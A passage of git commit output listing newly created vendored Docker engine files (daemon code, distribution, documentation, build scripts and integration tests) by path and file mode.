vendor/github.com/docker/docker/daemon/logger/splunk/splunkhecmock_test.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/syslog/syslog.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/syslog/syslog_test.go create mode 100644 vendor/github.com/docker/docker/daemon/logs.go create mode 100644 vendor/github.com/docker/docker/daemon/logs_test.go create mode 100644 vendor/github.com/docker/docker/daemon/metrics.go create mode 100644 vendor/github.com/docker/docker/daemon/monitor.go create mode 100644 vendor/github.com/docker/docker/daemon/monitor_linux.go create mode 100644 vendor/github.com/docker/docker/daemon/monitor_solaris.go create mode 100644 vendor/github.com/docker/docker/daemon/monitor_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/mounts.go create mode 100644 vendor/github.com/docker/docker/daemon/names.go create mode 100644 vendor/github.com/docker/docker/daemon/network.go create mode 100644 vendor/github.com/docker/docker/daemon/network/settings.go create mode 100644 vendor/github.com/docker/docker/daemon/oci_linux.go create mode 100644 vendor/github.com/docker/docker/daemon/oci_solaris.go create mode 100644 vendor/github.com/docker/docker/daemon/oci_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/pause.go create mode 100644 vendor/github.com/docker/docker/daemon/prune.go create mode 100644 vendor/github.com/docker/docker/daemon/rename.go create mode 100644 vendor/github.com/docker/docker/daemon/resize.go create mode 100644 vendor/github.com/docker/docker/daemon/restart.go create mode 100644 vendor/github.com/docker/docker/daemon/search.go create mode 100644 vendor/github.com/docker/docker/daemon/search_test.go create mode 100644 vendor/github.com/docker/docker/daemon/seccomp_disabled.go create mode 100644 vendor/github.com/docker/docker/daemon/seccomp_linux.go create mode 100644 vendor/github.com/docker/docker/daemon/seccomp_unsupported.go create mode 100644 vendor/github.com/docker/docker/daemon/secrets.go create mode 100644 vendor/github.com/docker/docker/daemon/secrets_linux.go create mode 100644 vendor/github.com/docker/docker/daemon/secrets_unsupported.go create mode 100644 vendor/github.com/docker/docker/daemon/selinux_linux.go create mode 100644 vendor/github.com/docker/docker/daemon/selinux_unsupported.go create mode 100644 vendor/github.com/docker/docker/daemon/start.go create mode 100644 vendor/github.com/docker/docker/daemon/start_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/start_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/stats.go create mode 100644 vendor/github.com/docker/docker/daemon/stats_collector.go create mode 100644 vendor/github.com/docker/docker/daemon/stats_collector_solaris.go create mode 100644 vendor/github.com/docker/docker/daemon/stats_collector_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/stats_collector_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/stats_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/stats_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/stop.go create mode 100644 vendor/github.com/docker/docker/daemon/top_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/top_unix_test.go create mode 100644 vendor/github.com/docker/docker/daemon/top_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/unpause.go create mode 100644 vendor/github.com/docker/docker/daemon/update.go create mode 100644 vendor/github.com/docker/docker/daemon/update_linux.go create mode 100644 vendor/github.com/docker/docker/daemon/update_solaris.go create mode 100644 vendor/github.com/docker/docker/daemon/update_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/volumes.go create mode 100644 vendor/github.com/docker/docker/daemon/volumes_unit_test.go create mode 100644 vendor/github.com/docker/docker/daemon/volumes_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/volumes_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/wait.go create mode 100644 vendor/github.com/docker/docker/daemon/workdir.go create mode 100644 vendor/github.com/docker/docker/distribution/config.go create mode 100644 vendor/github.com/docker/docker/distribution/errors.go create mode 100644 vendor/github.com/docker/docker/distribution/fixtures/validate_manifest/bad_manifest create mode 100644 vendor/github.com/docker/docker/distribution/fixtures/validate_manifest/extra_data_manifest create mode 100644 vendor/github.com/docker/docker/distribution/fixtures/validate_manifest/good_manifest create mode 100644 vendor/github.com/docker/docker/distribution/metadata/metadata.go create mode 100644 vendor/github.com/docker/docker/distribution/metadata/v1_id_service.go create mode 100644 vendor/github.com/docker/docker/distribution/metadata/v1_id_service_test.go create mode 100644 vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service.go create mode 100644 vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service_test.go create mode 100644 vendor/github.com/docker/docker/distribution/pull.go create mode 100644 vendor/github.com/docker/docker/distribution/pull_v1.go create mode 100644 vendor/github.com/docker/docker/distribution/pull_v2.go create mode 100644 vendor/github.com/docker/docker/distribution/pull_v2_test.go create mode 100644 vendor/github.com/docker/docker/distribution/pull_v2_unix.go create mode 100644 vendor/github.com/docker/docker/distribution/pull_v2_windows.go create mode 100644 vendor/github.com/docker/docker/distribution/push.go create mode 100644 vendor/github.com/docker/docker/distribution/push_v1.go create mode 100644 vendor/github.com/docker/docker/distribution/push_v2.go create mode 100644 vendor/github.com/docker/docker/distribution/push_v2_test.go create mode 100644 vendor/github.com/docker/docker/distribution/registry.go create mode 100644 vendor/github.com/docker/docker/distribution/registry_unit_test.go create mode 100644 vendor/github.com/docker/docker/distribution/utils/progress.go create mode 100644 vendor/github.com/docker/docker/distribution/xfer/download.go create mode 100644 vendor/github.com/docker/docker/distribution/xfer/download_test.go create mode 100644 vendor/github.com/docker/docker/distribution/xfer/transfer.go create mode 100644 vendor/github.com/docker/docker/distribution/xfer/transfer_test.go create mode 100644 vendor/github.com/docker/docker/distribution/xfer/upload.go create mode 100644 vendor/github.com/docker/docker/distribution/xfer/upload_test.go create mode 100644 vendor/github.com/docker/docker/dockerversion/useragent.go create mode 100644 vendor/github.com/docker/docker/dockerversion/version_lib.go create mode 100644 vendor/github.com/docker/docker/docs/README.md create mode 100644 vendor/github.com/docker/docker/docs/api/v1.18.md create mode 100644 vendor/github.com/docker/docker/docs/api/v1.19.md create mode 100644 vendor/github.com/docker/docker/docs/api/v1.20.md create mode 100644 vendor/github.com/docker/docker/docs/api/v1.21.md create mode 100644 vendor/github.com/docker/docker/docs/api/v1.22.md create mode 100644 vendor/github.com/docker/docker/docs/api/v1.23.md create mode 100644 vendor/github.com/docker/docker/docs/api/v1.24.md create mode 100644 vendor/github.com/docker/docker/docs/api/version-history.md create mode 100644 vendor/github.com/docker/docker/docs/deprecated.md create mode 100644 vendor/github.com/docker/docker/docs/extend/EBS_volume.md create mode 100644 vendor/github.com/docker/docker/docs/extend/config.md create mode 100644 vendor/github.com/docker/docker/docs/extend/images/authz_additional_info.png create mode 100644 vendor/github.com/docker/docker/docs/extend/images/authz_allow.png create mode 100644 vendor/github.com/docker/docker/docs/extend/images/authz_chunked.png create mode 100644 vendor/github.com/docker/docker/docs/extend/images/authz_connection_hijack.png create mode 100644 vendor/github.com/docker/docker/docs/extend/images/authz_deny.png create mode 100644 vendor/github.com/docker/docker/docs/extend/index.md create mode 100644 vendor/github.com/docker/docker/docs/extend/legacy_plugins.md create mode 100644 vendor/github.com/docker/docker/docs/extend/plugin_api.md create mode 100644 vendor/github.com/docker/docker/docs/extend/plugins_authorization.md create mode 100644 vendor/github.com/docker/docker/docs/extend/plugins_graphdriver.md create mode 100644 vendor/github.com/docker/docker/docs/extend/plugins_network.md create mode 100644 vendor/github.com/docker/docker/docs/extend/plugins_volume.md create mode 100644 vendor/github.com/docker/docker/docs/reference/builder.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/attach.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/build.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/cli.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/commit.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/container_prune.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/cp.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/create.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/deploy.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/diff.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/docker_images.gif create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/dockerd.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/events.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/exec.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/export.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/history.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/image_prune.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/images.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/import.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/index.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/info.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/inspect.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/kill.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/load.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/login.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/logout.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/logs.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/menu.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/network_connect.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/network_create.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/network_disconnect.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/network_inspect.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/network_ls.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/network_prune.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/network_rm.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/node_demote.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/node_inspect.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/node_ls.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/node_promote.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/node_ps.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/node_rm.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/node_update.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/pause.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_create.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_disable.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_enable.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_inspect.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_install.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_ls.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_push.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_rm.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_set.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_upgrade.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/port.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/ps.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/pull.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/push.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/rename.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/restart.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/rm.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/rmi.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/run.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/save.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/search.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/secret_create.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/secret_inspect.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/secret_ls.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/secret_rm.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_create.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_inspect.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_logs.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_ls.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_ps.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_rm.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_scale.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_update.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/stack_deploy.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/stack_ls.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/stack_ps.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/stack_rm.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/stack_services.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/start.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/stats.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/stop.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/swarm_init.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/swarm_join.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/swarm_join_token.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/swarm_leave.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock_key.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/swarm_update.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/system_df.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/system_prune.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/tag.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/top.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/unpause.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/update.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/version.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/volume_create.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/volume_inspect.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/volume_ls.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/volume_prune.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/volume_rm.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/wait.md create mode 100644 vendor/github.com/docker/docker/docs/reference/glossary.md create mode 100644 vendor/github.com/docker/docker/docs/reference/index.md create mode 100644 vendor/github.com/docker/docker/docs/reference/run.md create mode 100644 vendor/github.com/docker/docker/docs/static_files/contributors.png create mode 100644 vendor/github.com/docker/docker/docs/static_files/docker-logo-compressed.png create mode 100644 vendor/github.com/docker/docker/experimental/README.md create mode 100644 vendor/github.com/docker/docker/experimental/checkpoint-restore.md create mode 100644 vendor/github.com/docker/docker/experimental/docker-stacks-and-bundles.md create mode 100644 vendor/github.com/docker/docker/experimental/images/ipvlan-l3.gliffy create mode 100644 vendor/github.com/docker/docker/experimental/images/ipvlan-l3.png create mode 100644 vendor/github.com/docker/docker/experimental/images/ipvlan-l3.svg create mode 100644 vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.gliffy create mode 100644 vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.png create mode 100644 vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.svg create mode 100644 vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.gliffy create mode 100644 vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.png create mode 100644 vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.svg create mode 100644 vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.gliffy create mode 100644 vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.png create mode 100644 vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.svg create mode 100644 vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.gliffy create mode 100644 vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.png create mode 100644 vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.svg create mode 100644 vendor/github.com/docker/docker/experimental/vlan-networks.md create mode 100644 vendor/github.com/docker/docker/hack/Jenkins/W2L/postbuild.sh create mode 100644 vendor/github.com/docker/docker/hack/Jenkins/W2L/setup.sh create mode 100644 vendor/github.com/docker/docker/hack/Jenkins/readme.md create mode 100755 vendor/github.com/docker/docker/hack/dind create mode 100755 vendor/github.com/docker/docker/hack/dockerfile/binaries-commits create mode 100755 vendor/github.com/docker/docker/hack/dockerfile/install-binaries.sh create mode 100755 vendor/github.com/docker/docker/hack/generate-authors.sh create mode 100755 vendor/github.com/docker/docker/hack/generate-swagger-api.sh create mode 100644 vendor/github.com/docker/docker/hack/install.sh create mode 100644 vendor/github.com/docker/docker/hack/make.ps1 create mode 100755 vendor/github.com/docker/docker/hack/make.sh create mode 100644 vendor/github.com/docker/docker/hack/make/.binary create mode 100644 vendor/github.com/docker/docker/hack/make/.binary-setup create mode 100644 vendor/github.com/docker/docker/hack/make/.build-deb/compat create mode 100644 vendor/github.com/docker/docker/hack/make/.build-deb/control create mode 100644 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.bash-completion create mode 120000 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.default create mode 120000 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.init create mode 120000 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.upstart create mode 100644 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.install create mode 100644 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.manpages create mode 100644 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.postinst create mode 120000 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.udev create mode 100644 vendor/github.com/docker/docker/hack/make/.build-deb/docs create mode 100755 vendor/github.com/docker/docker/hack/make/.build-deb/rules create mode 100644 vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine-selinux.spec create mode 100644 vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine.spec create mode 100644 vendor/github.com/docker/docker/hack/make/.detect-daemon-osarch create mode 100644 vendor/github.com/docker/docker/hack/make/.ensure-emptyfs create mode 100644 vendor/github.com/docker/docker/hack/make/.go-autogen create mode 100644 vendor/github.com/docker/docker/hack/make/.go-autogen.ps1 create mode 100644 vendor/github.com/docker/docker/hack/make/.integration-daemon-setup create mode 100644 vendor/github.com/docker/docker/hack/make/.integration-daemon-start create mode 100644 vendor/github.com/docker/docker/hack/make/.integration-daemon-stop create mode 100644 vendor/github.com/docker/docker/hack/make/.integration-test-helpers create mode 100644 vendor/github.com/docker/docker/hack/make/.resources-windows/common.rc create mode 100644 vendor/github.com/docker/docker/hack/make/.resources-windows/docker.exe.manifest create mode 100644 vendor/github.com/docker/docker/hack/make/.resources-windows/docker.ico create mode 100644 vendor/github.com/docker/docker/hack/make/.resources-windows/docker.png create mode 100644 vendor/github.com/docker/docker/hack/make/.resources-windows/docker.rc create mode 100644 vendor/github.com/docker/docker/hack/make/.resources-windows/dockerd.rc create mode 100644 vendor/github.com/docker/docker/hack/make/.resources-windows/event_messages.mc create mode 100644 vendor/github.com/docker/docker/hack/make/.resources-windows/resources.go create mode 100644 vendor/github.com/docker/docker/hack/make/README.md create mode 100644 vendor/github.com/docker/docker/hack/make/binary create mode 100644 vendor/github.com/docker/docker/hack/make/binary-client create mode 100644 vendor/github.com/docker/docker/hack/make/binary-daemon create mode 100644 vendor/github.com/docker/docker/hack/make/build-deb create mode 100644 vendor/github.com/docker/docker/hack/make/build-integration-test-binary create mode 100644 vendor/github.com/docker/docker/hack/make/build-rpm create mode 100755 vendor/github.com/docker/docker/hack/make/clean-apt-repo create mode 100755 vendor/github.com/docker/docker/hack/make/clean-yum-repo create mode 100644 vendor/github.com/docker/docker/hack/make/cover create mode 100644 vendor/github.com/docker/docker/hack/make/cross create mode 100644 vendor/github.com/docker/docker/hack/make/dynbinary create mode 100644 vendor/github.com/docker/docker/hack/make/dynbinary-client create mode 100644 vendor/github.com/docker/docker/hack/make/dynbinary-daemon create mode 100755 vendor/github.com/docker/docker/hack/make/generate-index-listing create mode 100644 vendor/github.com/docker/docker/hack/make/install-binary create mode 100644 vendor/github.com/docker/docker/hack/make/install-binary-client create mode 100644 vendor/github.com/docker/docker/hack/make/install-binary-daemon create mode 100644 vendor/github.com/docker/docker/hack/make/install-script create mode 100755 vendor/github.com/docker/docker/hack/make/release-deb create mode 100755 vendor/github.com/docker/docker/hack/make/release-rpm create mode 100644 vendor/github.com/docker/docker/hack/make/run create mode 100755 vendor/github.com/docker/docker/hack/make/sign-repos create mode 100755 vendor/github.com/docker/docker/hack/make/test-deb-install create mode 100644 vendor/github.com/docker/docker/hack/make/test-docker-py create mode 100755 vendor/github.com/docker/docker/hack/make/test-install-script create mode 100755 vendor/github.com/docker/docker/hack/make/test-integration-cli create mode 100644 vendor/github.com/docker/docker/hack/make/test-integration-shell create mode 100755 vendor/github.com/docker/docker/hack/make/test-old-apt-repo create mode 100644 vendor/github.com/docker/docker/hack/make/test-unit create mode 100644 vendor/github.com/docker/docker/hack/make/tgz create mode 100644 vendor/github.com/docker/docker/hack/make/ubuntu create mode 100755 vendor/github.com/docker/docker/hack/make/update-apt-repo create mode 100644 vendor/github.com/docker/docker/hack/make/win create mode 100755 vendor/github.com/docker/docker/hack/release.sh create mode 100644 vendor/github.com/docker/docker/hack/validate/.swagger-yamllint create mode 100644 vendor/github.com/docker/docker/hack/validate/.validate create mode 100755 vendor/github.com/docker/docker/hack/validate/all create mode 100755 vendor/github.com/docker/docker/hack/validate/compose-bindata create mode 100755 vendor/github.com/docker/docker/hack/validate/dco create mode 100755 vendor/github.com/docker/docker/hack/validate/default create mode 100755 vendor/github.com/docker/docker/hack/validate/default-seccomp create mode 100755 vendor/github.com/docker/docker/hack/validate/gofmt create mode 100755 vendor/github.com/docker/docker/hack/validate/lint create mode 100755 vendor/github.com/docker/docker/hack/validate/pkg-imports create mode 100755 vendor/github.com/docker/docker/hack/validate/swagger create mode 100755 vendor/github.com/docker/docker/hack/validate/swagger-gen create mode 100755 vendor/github.com/docker/docker/hack/validate/test-imports create mode 100755 vendor/github.com/docker/docker/hack/validate/toml create mode 100755 vendor/github.com/docker/docker/hack/validate/vendor create mode 100755 vendor/github.com/docker/docker/hack/validate/vet create mode 100755 vendor/github.com/docker/docker/hack/vendor.sh create mode 100644 vendor/github.com/docker/docker/image/fs.go create mode 100644 vendor/github.com/docker/docker/image/fs_test.go create mode 100644 vendor/github.com/docker/docker/image/image.go create mode 100644 vendor/github.com/docker/docker/image/image_test.go create mode 100644 vendor/github.com/docker/docker/image/rootfs.go create mode 100644 vendor/github.com/docker/docker/image/spec/v1.1.md create mode 100644 vendor/github.com/docker/docker/image/spec/v1.2.md create mode 100644 vendor/github.com/docker/docker/image/spec/v1.md create mode 100644 vendor/github.com/docker/docker/image/store.go create mode 100644 vendor/github.com/docker/docker/image/store_test.go create mode 100644 vendor/github.com/docker/docker/image/tarexport/load.go create mode 100644 vendor/github.com/docker/docker/image/tarexport/save.go create mode 100644 vendor/github.com/docker/docker/image/tarexport/tarexport.go create mode 100644 vendor/github.com/docker/docker/image/v1/imagev1.go create mode 100644 vendor/github.com/docker/docker/image/v1/imagev1_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/benchmark_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/check_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/daemon.go create mode 100644 vendor/github.com/docker/docker/integration-cli/daemon_swarm.go create mode 100644 vendor/github.com/docker/docker/integration-cli/daemon_swarm_hack.go create mode 100644 vendor/github.com/docker/docker/integration-cli/daemon_unix.go create mode 100644 vendor/github.com/docker/docker/integration-cli/daemon_windows.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_attach_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_auth_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_build_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_containers_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_create_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_events_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_exec_resize_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_exec_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_images_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_info_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_inspect_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_inspect_unix_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_logs_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_network_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_resize_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_service_update_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_stats_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_stats_unix_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_swarm_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_update_unix_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_version_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_volumes_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_attach_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_attach_unix_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_authz_plugin_v2_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_authz_unix_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_build_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_build_unix_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_by_digest_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_commit_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_config_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_cp_from_container_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_cp_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_unix_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_cp_utils.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_create_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_plugins_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_diff_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_events_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_events_unix_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_exec_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_exec_unix_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_experimental_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_export_import_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_external_graphdriver_unix_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_external_volume_driver_unix_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_health_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_help_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_history_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_images_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_import_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_info_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_info_unix_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_inspect_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_kill_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_links_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_links_unix_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_login_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_logout_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_logs_bench_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_logs_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_nat_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_netmode_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_network_unix_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_oom_killed_test.go create mode 100644 